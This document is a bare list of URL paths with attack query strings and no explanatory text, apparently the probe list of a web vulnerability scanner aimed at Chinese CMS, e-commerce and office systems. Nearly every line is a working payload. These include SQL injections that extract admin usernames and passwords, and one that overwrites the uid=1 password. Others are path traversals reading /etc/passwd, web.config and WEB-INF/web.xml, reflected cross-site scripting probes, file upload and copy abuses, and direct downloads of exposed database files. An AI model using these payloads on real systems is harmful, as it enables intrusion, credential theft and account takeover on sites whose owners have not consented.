/index.php?act=show_groupbuy&op=groupbuy_list&groupbuy_area=&groupbuy_class=&groupbuy_price=1&groupbuy_order_key=price&groupbuy_order=asc,%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),%20md5(1122))a%20from%20information_schema.tables%20group%20by%20a)b);%23
/index.php?act=search&key=click&order=desc,%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),%20md5(1122))a%20from%20information_schema.tables%20group%20by%20a)b);%23&cate_id=8
/wap/index.php
/deals?end_time=1&searchName=%25'%20AND%201=1%20AND%20'%25'='&start_time=1
/statistics.php?pageurl=pageurl&referer=http://www.baidu.com/?wd=aaaa%2527),((select%201%20from%20(select%20count(*),concat(version(),0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a),2,3,4,5,6,7,8,9)%23
/member/index.php
/wap/index.php?mod=space&userid=1'%20and%20extractvalue(1,(select%20md5(1122)from%20my_admin%20limit%201));%20%23
/index.php?act=index&op=list&city_id=1&area_id=&mall_id=&class_id=3&class_id_1=22&pconsume=&orderby=add_time%20asc,%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),%20md5(1122))a%20from%20information_schema.tables%20group%20by%20a)b);%23&sort=asc
/video.php
/news.php?classid=2
/ajax.php?action=dig&module=members%20set%20username=00000,password=0x3235306366386235316337373366336638646338623462653836376139613032%20where%20uid=1%20--%20a
/count.php?type=news%20SET%20views%20=%20views-1%20WHERE%20id=1%20and%201=(updatexml(1,concat(0x5e24,(select%20concat(0x3a,md5(1122),0x3a)%20from%20boka_members%20where%20uid=1),0x5e24),1))--+&&action=showcount&id=1
/ajax.php?action=contentpage
/comments.php?id=3a&tablepre=boka_ckck
/rss.php?module=news&attasql=union%20select%201,reer,3,4%20from%20boka_members%20where%20uid=1%20order%20by%20id%20asc%20%20--%20a
//wap/board.php?filter=3%20union%20select%201,2,3,4,webscan,6,7,8,9,10,11,cfreer,13,14,15,16,17,18,19,20,21,22%20from%20boka_members%20where%20uid=1%20--%20a&classid=1a&digest=1
/admin/index.php?_m=../template/css/login.css%00&_a=admin_list
/case/?settings[met_img]=met_admin_table%20where%201=1%20--%201
/login.aspx?test=TestSystem&password=1122&oid=2%20and%202=(convert(int,char(106)))&uid=1
/info.php?fid=1&tblprefix=cms_msession%20and%201=reer%20--
/ajax.php?action=letter&letter=a
/index.php?q=1%25%2527%2520and%25201%253D2%2520%2523&do=search&action=lists&module=product
/index.php?action=detail&do=offer&title=%2527or%25201%253D2%2523
/index.php/Index/index/name/$%7B@print(md5(1122))%7D
/index.php?m=news&s=admin/newslist&submit=%E5%88%A0%E9%99%A4&did=999%29%20and%20%28SELECT%201%20from%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28select%28selEct%20concat%28user,0x7c,password%29%20from%20f10bd198561acb0197452013b7a82429%20limit%200,1%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%23
/index.php?m=payment&s=admin/pickupmod
/admin/receive.php?signMsg=0FEBF34C4A2EBF825F60025D6C0576F2&version=%3Cobject%20data=data:text/html;base64,PHNjcmlwdD5hbGVydCg0Mjg3Myk8L3NjcmlwdD4=%3E
/user/City_ajax.aspx?Cityid=-1'%20%20union%20%20SELECT%20'webscan',2%20FROM%20fs_sys_User%20WHERE%20id=7%20%20and%20'1'='1
/servlet/ShowPic?filePath=/tomcat/webapps/ROOT/WEB-INF/web.xml
/mep-admin/DcServlet
/mep-admin/userAction!queryUser.action?start=0&limit=10
/admin/picupload.aspx
/manager/picupload.aspx
/microshop/index.php?act=api&op=get_personal_commend&data_count=1%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,concat(0x7c,md5(1122),0x7c),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46%20from%20shopnc_admin
/TreeDialogController.zc?backId=buyer_id_0&backName=buyer_name_0&dialogType=radio&method=getBuyerDialog&tempBackId=temp_buyur_id_0&tempBackName=temp_buyer_name_0
/admin.php?c=ajax&f=exit&filename=opt&group_id=1%20union%20select%203,1,0,md5(1122),account,6%20from%20qinggan_adm%20where%20id%20like%201%23&identifier=1
/index.php?c=tj&f=include&js=/../../config.php
/index.php?c=ueditor&f=remote_image&upfile=http://0.0.0.0/reer.php
/api.php?c=opt&f=index&group_id=-1%20union%20select%201,2,0,md5(1122),5,6&identifier=reer
/radcontrols/editor/dialog.aspx?dialog=ImageManager&editorID=');%3C/script%3E%3CScRiPt/acu%20src=1%20onerror=alert(42873)%3E%3C/ScRiPt%3E%3Cscript%3E//&language=zh_CN&sessionID2=8ca6abaf-d361-328c-9178-%20f78311cd0329&UseEmbeddedScripts=yes&useSession=0
/system/nhome/login.jsp?message=%22)--%3E%3C/script%3E%3Cscript%3Ealert(42873)%3C/script%3E
/cgi/index.cgi?error=badlogin&__mode=show_login%27%22%28%29%26%25%3CScRiPt%20%3Ealert%2842873%29%3C%2fScRiPt%3E
/
/styles/outlook1/tools/calendar/calEditEvent.php?action=edit%22%3E%3Cscript%3Ealert(42873)%3C/script%3Ebad=%22&calid=
/web/User_Sort_List.aspx?infoid=2%20and%20char(106)=0
/forgetbf.asp?errstr=--%3E%3C/script%3E%3Cscript%3Ealert(42873)%3C/script%3E
/Ajax_Handle/UploadAttachmentHandler.ashx
/Web/Exam_List.aspx?typeid=18%20or%20(char(106)=0)
/Ajax_Handle/UploadPictureHandler.ashx
/Ajax_Handle/UploadLocalVideoHandler.ashx
/index.php?m=api&a=userpreview
/index.php?m=Appmanager&a=loadapp
/CMSUploadFile.aspx
/api/shop.aspx
/sysinfo.jsp
/login/Log.aspx?loginname=/**/'/**/and/**/char(106)%3E0/**/--
/login/publicpage.aspx?infotype=InfoZWGK_zwgk'/**/and/**/char(106)%3E0/**/--&dic_name=
/file/MyDownLoad.ashx?path=../web.config
/file/PackagDownload.ashx?sessionId=../../../../../webscan.txt
/broadcast/displaynewspic.aspx?id=1/**/and/**/1=char(106)/**/
/feedback/processvalue.aspx?num=e'/**/and/**/char(106)%3E0%20--
/channel/QueryHig.aspx?AcceptDept=&AppBusinessName='/**/and/**/char(106)%3E0/**/%20--%20
/login/proexamineview.aspx?ActivityInstanceId='/**/and/**/user/**/%3E0/**/--
/api.php?op=video_api&pc_hash=test%22/%3Ec%3Cscscriptript%3Ealert(42873)%3C/scscriptript%3E&&do_complete=1&uid=1&snid=1
/FileDownloadServlet?websiteId=1&templateName=/&fileNames=../../WEB-INF/config/db/dataSource.xml
/setup/setup1.jsp
/examlist/id-12,pid-104,key-%27and(char(106)=0)or%271%27=%27.aspx
/Article/?Type=18%20/**/and/**/1=char(106)--
/login/TransactList.aspx?ItemName='/**/and/**/1=char(106)/**/--
/file/EmailDownload.ashx?url=~/web.config&name=web.config
/file/UDFDownLoad.ashx?path=~/Global.asax&name=Global.asax
/file/DownLoad.ashx?path=~/Routes.config
/file/FileUpload.asmx/UploadFileBase64?url=~/Content/cesi.aspx&data=VGhpcyBpcyBhIHRlc3QgLSBieSBjZnJlZXIgd2Vic2Nhbg%3D%3D&status=0
/file/FileUpload.asmx/CopyFile?sourcePath=/web.config&targetPath=/Content/reer.txt&overwrite=true
/download.jsp?path=WEB-INF/&name=web.xml
/page/upload/down_file.jsp?fileName=ljer.gif'%20or%20'1'='2
/mx_form/order_save.php
/index.php?app=tag&ac=add&ts=do
/member.php?act=index
/Article/?KeyWord=1'%20and%201=char(97)%20--
/apas/portal/tableDownload/download.jsp?tmpfilename=../index.jsp
/admin/payonline.php?act=login&table=information_schema.SCHEMATA%20where%201=(select%201%20from%20%20(select%20count(*),concat(version(),0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/frame/help/read_help.php?HELP_ID=-1%20union%20select%201,2,3,concat(0x7c,md5(1122),0x7c),5,6
/Channel/SearchResult.aspx?ItemName=1'%20or%201%3Echar(106)%20--
/Broadcast/Broadcast.aspx?type='%20or%201=char(106)%20--
/Broadcast/BroadcastView.aspx?type=InfoTPXW&InfoId=1122'%20and/**/1=char(106)--
/Channel/ChannelList.aspx?a=a&LicenseType=2'%20and/**/1=char(106)--
/jvideo/down.jsp?pathfile=/WEB-INF/ini/merpserver.ini%00.flv
/jiep/down.jsp?pathfile=down.jsp%00.txt
/index.php?m=Goods&a=showcate&id=1'cfreer
/Goods-showcate-id-1.html'cfreer
/pages/search_disk_usage.php?archive=a'%20and%20(SELECT%201%20FROM%20(select%20count(*),concat(floor(rand(0)*2),(SELECT%20md5(1122)%20from%20user%20limit%200,1))a%20from%20information_schema.tables%20group%20by%20a)b)%20and%20'1'='1
/jvideo/objectbox/selectx_userlist.jsp
/yhzc/NewFile.jsp?loginname=admin'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/yhzc/isPass.jsp?id=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/yhzc/isFlag.jsp?loginname=admin'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/Bulletin/Businessview.aspx?infoFlowId=0'%20and/**/1=char(106)%20--
/Bulletin/ColumnList.aspx?LanMuId=1'%20and/**/1=char(106)%20--
/Channel/TableDownLoadList.aspx?deptid=0011')%20and/**/1=char(106)--
/celerityAlleywayDetail.do?type=7'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/Bulletin/DocmentDownload.aspx?ID=1122'%20and/**/1=char(106)--
/ViewSource/SrcStencilList.aspx?listType=1&SerailNO=11xxxxxxxx&buqiId=22&infoflowId=1122'%20and/**/1=char(106)--
/ViewSource/ProExamineView.aspx?ActivityInstanceId=0&ActivitySchemeGuid=00000000-0000-0000-0000-00000000000'--
/burgherServiceDetail.do?bs=1&serviceType=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122
/yushouli/yushouliResult.do?item_ID=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122
/indexGetDatags.do?depNO=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122
/bqbzDetail.do?id=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122
/counter/counter2.php?id=(select%201%20from%20(select%20count(*),concat((select(select%20concat(cast(concat(0x7e,md5(1122))%20as%20char),0x7e))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)
/oa_server/App_Pages/App_page/UserSpuerAdd.aspx
/oa_server/App_Pages/App_page/user_list.aspx
/cms/cms/site/cms_site_template_upload.jsp?action=save
/cai_study.asp?FN=cai/test.flv&cls_no=&cai_no=lzgy&stu_no=1122'%20and%201=char(106);--
/deptProceedingDetailnew.do?itemtype=6&depNO=1122'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122&approveName=&nowPage=3
/deptProceedingDetailnew.do?itemtype=12%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)&depNO=jx&approveName=&nowPage=3
/lm/front/reg.jsp?sysid=../reg.jsp%00.jpg
/web/SubmitLogin.do
/pic.aspx?classid=60)%20and%201=char(106)%20--
/frm/Count.aspx?id=29308%20AND%201=char(106)%20--&type=List
/engine/websigncontrol/readsigndata.jsp?id='%20union%20select%20concat(char(98,121),0x7c,char(99,102,114,101,101,114))%23
/index.php?c=MTA3==&op=../../../../../../../../../../etc/passwd%00.jpg
/SRP2003/UserManage/sysuser/modifypage.asp?id=1
/venus/AsVenusCA/desk/message/reply.asp
/Article/ArticleDetaileNews.aspx?type=2/**/and/**/1=char(106)--
/mx_form/order_save.php?form_id=5
/download.aspx?id=337&accessory=UploadFile/softdown/../../web.config
/cms/web/testsql.jsp
/web/zwdt/jjj.BjcxServlet
/login.php?LOGIN_USER_INCLUDE=/etc/passwd
/cms/client/uploadpic_html.jsp?toname=test.jsp&diskno=webscan
/cms/fileupload/uploadwordpic.jsp?AddWebInfoTID=11&AddWebColumnID=22&filepath=/app/
/columninfo.jsp?ColumnID=-5%20UNION%20SELECT%201,2,md5(1122),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38%23
/columninfo.jsp?ColumnID=-5%20UNION%20SELECT%201,2,3,char(106),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39%23
/webUser/webUser!list.action
/logincheck.php?UNAME=cfreer%df'and%20(select%201%20from%20%20(select%20count(*),concat((select%20md5(1122)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23&PASSWORD=test
/module/AIP/upload.php?T_ID=1&RUN_ID=1%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/admin/annual/delete_leave.post.php
/admin/workingsituation/check.php?uid=3%20and%201%3D%28updatexml%281%2Cconcat%280x5e24%2C%28select%20md5%281122%29%29%2C0x5e24%29%2C1%29%29&project=459&type=task&name=bbb
/admin/workingsituation/download_excel.php?day=30&start=&end=&project=0&uid=3%20and%201%3D%28updatexml%281%2Cconcat%280x5e24%2C%28select%20md5%281122%29%29%2C0x5e24%29%2C1%29%29%23&task=0
/admin/workingsituation/ajax.php?task_id=10039s&type=update_status&status=1s%27%20and%201%3D%28updatexml%281%2Cconcat%280x23%2C%28select%20md5%281122%29%29%2C0x23%29%2C1%29%29%23
/down.asp?cat_%69d=3%20and%201=2%20union%20select%201,'ijx',3,4,5,6,7,8,9,10,11,12,13%20from%20admin
/jdwm/cgi/getpwd.cgi
/public/jspdownload.jsp?FileFullPath=%5Cetc%5Cpasswd&FileName=passwd
/public/jspdownload.jsp?FileFullPath=c:%5Cwindows%5Cwin.ini&FileName=win.ini
/cms/web/jspdownload.jsp?FileUrl=c:%5Cwindows%5Cwin.ini
/cms/web/jspdownload.jsp?FileUrl=%5Cetc%5Cpasswd
/cms/web/dimensionpic.jsp?action=copy&SrcPicPath=/WEB-INF/web.xml&PicPath=/cms/web/reer.txt
/CorpInfo/CorpBaseInfo.aspx?CorpCode=1122'%20and%201=char(106)%20--
/CorpInfo/CorpAptitudeInfo.aspx?CorpCode=1122'%20and%201=char(106)%20--
/CorpInfo/PersonnelList.aspx?CorpCode=1122'%20and%201=char(106)%20--
/CorpInfo/CorpAchievementList_SG.aspx?CorpCode=1122'%20and%201=char(106)%20--
/Credit/ShowCorpCredit.aspx?CorpCode=1122'%20and%201=char(106)%20--
/CorpInfo/CorpDeBox.aspx?CorpCode=1122'%20and%201=char(106)%20--
/CorpInfo/CorpRewardsList.aspx?RewardsPunishment=1122&CorpCode=1122'%20and%201=char(106)%20--
/BM/Project/HistoryBindSegmentLeftList.aspx?CorpType=1122&CorpCode=1122'%20and%201=char(106)%20--
/CorpInfo/CorpSendLeftTree.aspx?JoinID=1122&CorpCode=1122'%20and%201=char(106)%20--
/forUI/Policy/showPolicy.aspx?ID=1122'%20and%201=char(106)%20--
/forUI/Person/EmplInfo.aspx?IDCard=1122'%20AND%201=CHAR(106)%20--%20
/forUI/Policy/DO.file?ID='%20or%201=char(106)%20--
/search/index/portalId/427?keyword=1'%7C%7C(SELECT%20'ijx'%20FROM%20DUAL%20WHERE%201122=1122%20AND%204567=UTL_INADDR.GET_HOST_ADDRESS((SELECT%20chr(114)%7C%7Cchr(101)%7C%7Cchr(106)%7C%7Cchr(101)%7C%7Cchr(114)%20FROM%20dual)))%7C%7C'
/Ajax_Handle/UploadAttachmentHandler.ashx
/ExtendForm/Down/Technological.aspx?id=1'%20and%201=char(106)%20--
/public/editext/up/soundsave.asp
/public/AspUpload/upload.asp?path=../../upload&processid=1
/xyEmployee_checkLoginForUser.do?userName=reer
/opac/ajax_get_file.php?filename=../admin/opacadminpwd.php
/zplug/ajax_asyn_link.old.php?url=../admin/opacadminpwd.php
/kc_view.php?id=-1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x5c,md5(1122),0x5c),NULL#
/kecheng.php?id=-1%20UNION%20ALL%20SELECT%20NULL,CONCAT(0x5c,md5(1122),0x5c),NULL,NULL#%20
/kecheng_view.php?id=-1%20UNION%20ALL%20SELECT%20NULL,CONCAT(0x5c,md5(1122),0x5c),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
/include/ad.php?id=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x5c,md5(1122),0x5c),NULL,NULL,NULL,NULL,NULL,NULL,NULL#
/index.php?language_id=1%20and%20%20%28SELECT%201%20from%20%28select%20count%28%2a%29%2Cconcat%28floor%28rand%280%29%2a2%29%2C%28substring%28%28select%28md5%281122%29%29%29%2C1%2C62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%23&is_protect=1&action=cccc
/picnews.asp?%69d=-1%20and%201=2%20union%20select%201,2,3,chr(106),5,6,7,8,9,10,11,12%20from%20admin
/opensoft.asp?%69d=10%20and%201=2
/phpsso_server/?m=phpsso&c=index&a=getapplist&appid=1&data=
/bmsltxDetail.do
/setAcceptance.do
/setAcceptance.do
/setMaterials.do?ITEM_ID=12'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/intoSpDept.do?bmid=1122'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/admin/payonline.php/login.php?table=information_schema.SCHEMATA%20where%201=(select%201%20from%20(select%20count(*),concat(0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
/nobom.php
/infoDisplayAction.do?method=listDeptInformationInFolderStyle&pageURL=/application/oa/information/view/buu_list.jsp&interval=5&departmentId=1'%20AND%209935=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)%7C%7CCHR(112)%7C%7CCHR(102)%7C%7CCHR(58)%7C%7CCHR(113)%7C%7C(SELECT%20(CASE%20WHEN%20(9935=9935)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(117)%7C%7CCHR(115)%7C%7CCHR(115)%7C%7CCHR(113))%20AND%20'keyi'='keyi&filters=
/lm/front/mailhotlist.jsp?editpagename=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd&sysid=001
/lm/front/findpsw.jsp?editpagename=&groupid=&sysid=../../../../../../../../../../etc/passwd%00.jpg
/admin/Admin_Config.asp
/Project_SPInfoList.aspx?CategoryCode=1'%20and%201=char(106)%20--
/zxts_view.aspx?Id=4%20and%201=char(106)%20--&GBType=1
/FileUpload
/oa_server/App_Pages/App_page/user_update.aspx?userid=172
/api.php?c=api&f=phpok&id=_sublist&param[pid]=1%20union%20select%20concat(md5(1122),0x7c,pass),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9%20from%20qinggan_user%23&param[phpok]=1
/conformID.asp?Tid=jx'%20and%201=char(106)%20--
/DelAccessID.asp?AccessID=1'%20and%201=char(106)%20--&Datetime=
/KS_Data/KesionCMS6.mdb
/KS_Data/KesionCMS7.mdb
/KS_Data/KesionCMS8.mdb
/KS_Data/KesionCMS9.mdb
/conformID.asp?Tname=web'%20/**/and/**/1=char(106)--
/Asearch.asp
/linklist.asp?TlinkID=26'/**/and/**/1=char(106)--
/zyjs.asp?Txy=18&tzy=11'%20/**/and/**/1=char(106)%20--
/Biogenic.asp?Tbynf=21'%20and%201=char(106)%20--
/specialty.asp?Tbynf=1%20and%201%3Echar(106)%20--
/api.php?op=video_api&pc_hash=1&uid=1&snid=1122%22%20onmouseover=alert(42873)//&do_complete=1
/toall/desktop/dbform.asp?fn=&fntxt=&varid=8%20AND%201122%3DCONVERT%28INT%2C%28CHAR%2899%29%2bCHAR%28102%29%2bCHAR%28114%29%2bCHAR%28101%29%2bCHAR%28101%29%2bCHAR%28114%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2858%29%2bCHAR%28106%29%2bCHAR%28120%29%29%29
/index.php?c=ajax&a=member_login&template=../../ooxx.php
/addcontent/webEditor/upload/files/file_down.jsp?filename=/../../../../WEB-INF/web.xml
/addcontent/webEditor/upload/files/file_down.jsp?filename=/.xx/./.xx/./.xx/./.xx/./WEB-INxx/F/web.xml
/Tools/FileTool/Manage/Notepad.aspx?objfile=C:/windows/win.ini
/Tools/FileTool/Manage/Notepad.aspx?objfile=/etc/passwd
/workflow/flow_details.aspx?action=details&job_id=-12%20and%201=char(106)
/search.aspx
/servlet/fileOpenforms?filename=/index.jsp
/application/gzhd/bgxz/download.jsp?filename=/index.jsp
/livefiles/pages/inner/userlist.aspx?ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1122'%20and%201=char(106)%20--
/truexxgk/app/nrglController/loadZwgk?zdjc=reer'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd&type=1
/NewsList.asp
/ActivityList.asp
/WidgetsHandler.ashx?widget=reer'%20where%201=1%20AND%20char(106)%3E0--
/common/guestbook.php
/common/help.php
/Comment/Comment.aspx?id=11'%20and%201=char(106)%20--
/wap/index.php?a=newslist
/index.php?_COOKIE[cfg][database]=mysql&_COOKIE[cfg][db_host]=localhost&_COOKIE[cfg][db_user]=webscan&_COOKIE[cfg][db_pass]=reer&_COOKIE[cfg][db_name]=db
/?question/tag/0%27%75nion%20select%201,2,3,4,5,6,(%73elect%20concat(0x23,md5(1122),0x23)%20%66rom%20ask_user%20limit%200,1),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%23.html
/?question/search/tag:0%27%75nion%20select%201,2,3,4,5,6,(%73elect%20concat(0x23,md5(1122),0x23)%20%66rom%20ask_user%20limit%200,1),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%23.html
/admin/uploadFile.action
/Adminiscentertrator/AdmIndex.asp
/Adminiscentertrator/AdmLinkInsert.asp
/corporation.php?rewrite=rewrite&Catid=db_mymps-my_corp%60%20where%201%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20my_admin%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/NewsList.asp
/bit-xxzs/xmlpzs/bsdetail.asp?id=-306'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
